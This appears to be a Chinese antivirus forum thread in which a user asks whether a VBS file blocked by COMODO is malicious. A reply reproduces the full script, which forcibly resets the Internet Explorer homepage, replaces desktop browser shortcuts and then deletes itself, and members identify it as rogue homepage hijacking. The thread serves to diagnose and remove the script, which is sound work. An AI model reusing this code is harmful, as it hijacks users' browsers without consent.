收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 国外杀毒软件 COMODO comodo拦截A.VBS是不是木马
12下一页
返回列表 发新帖
查看: 4348|回复: 15
收起左侧

[已解决] comodo拦截A.VBS是不是木马

 关闭 [复制链接]
wjnyzz
发表于 2013-9-1 11:52:11 | 显示全部楼层 |阅读模式
本帖最后由 wjnyzz 于 2013-9-6 23:27 编辑

求确认comodo拦截A.VBS是不是木马,vbs流氓删除又回来了,这次果断comodo拦截流氓,哈哈

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

wjnyzz
 楼主| 发表于 2013-9-1 12:03:06 | 显示全部楼层
本帖最后由 wjnyzz 于 2013-9-1 12:07 编辑

迅雷是流氓行为吗
回复

举报

秦王扫六合
发表于 2013-9-1 12:07:47 | 显示全部楼层
贴vbs源代码,或上传样本
回复

举报

wjnyzz
 楼主| 发表于 2013-9-1 12:17:13 | 显示全部楼层
秦王扫六合 发表于 2013-9-1 12:07
贴vbs源代码,或上传样本

vbs

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

fadianji
发表于 2013-9-1 12:21:26 | 显示全部楼层
迅雷那个库文件很恶心的。即使卸载了还会残留,进行联网操作;而且很难删除
回复

举报

tg123321
发表于 2013-9-1 12:49:59 | 显示全部楼层
wjnyzz 发表于 2013-9-1 12:17
vbs

是流氓推广
火眼:http://fireeye.ijinshan.com/anal ... 16f0df68&type=1
回复

举报

zhou0197
发表于 2013-9-1 12:51:09 | 显示全部楼层
wjnyzz 发表于 2013-9-1 12:17
vbs

On Error Resume Next
Set OS= WScript.CreateObject("WScript.Shell")
desktop = OS.SpecialFolders("desktop")
Set file = CreateObject("Scripting.FileSystemObject")
for i=0 to 60
URL = "http://www.hao690.com/"
if file.fileexists(desktop & "\360安全浏览器6.lnk") then
file.deleteFile desktop & "\360安全浏览器6.lnk"
file.CopyFile  "C:\WINDOWS\360安全浏览器6.lnk",desktop & "\"
End If
if file.fileexists(desktop & "\搜狗高速浏览器.lnk") then
file.deleteFile desktop & "\搜狗高速浏览器.lnk"
file.CopyFile  "C:\WINDOWS\搜狗高速浏览器.lnk",desktop & "\"
End If
if file.fileexists(desktop & "\2345智能浏览器.lnk") then
file.deleteFile desktop & "\2345智能浏览器.lnk"
file.CopyFile  "C:\WINDOWS\2345智能浏览器.lnk",desktop & "\"
End If
b=OS.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
if URL<> b then
OS.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",URL,"REG_SZ"
end if
WScript.Sleep(50000)
next
Dim fso
Set fso = CreateObject("scripting.filesystemobject")
fso.deleteFile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.lnk"
fso.deleteFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\.lnk"
fso.deleteFile "C:\WINDOWS\2345智能浏览器.lnk"
fso.deleteFile "C:\WINDOWS\搜狗高速浏览器.lnk"
fso.deleteFile "C:\WINDOWS\360安全浏览器6.lnk"
createobject("scripting.filesystemobject").getfile(wscript.scriptfullname).delete(True)



目测像是修改主页的恶意脚本…………

建议用360或者金山的急救箱,外加windows清理助手处理一遍。
回复

举报

wjnyzz
 楼主| 发表于 2013-9-1 12:53:24 | 显示全部楼层
zhou0197 发表于 2013-9-1 12:51
On Error Resume Next
Set OS= WScript.CreateObject("WScript.Shell")
desktop = OS.SpecialFolders(" ...

非常感谢,我刚刚打开C盘windows里面有这3个浏览器的快捷方式在
回复

举报

秦王扫六合
发表于 2013-9-1 12:54:12 | 显示全部楼层
wjnyzz 发表于 2013-9-1 12:17
vbs

楼上以下结论哈哈
回复

举报

wjnyzz
 楼主| 发表于 2013-9-1 12:55:44 | 显示全部楼层
zhou0197 发表于 2013-9-1 12:51
On Error Resume Next
Set OS= WScript.CreateObject("WScript.Shell")
desktop = OS.SpecialFolders(" ...

我上午的时候comodo提示窗口我给放行了,现在现在清理掉,直接去C盘windows里面删除吗
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-29 12:16 , Processed in 0.075895 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表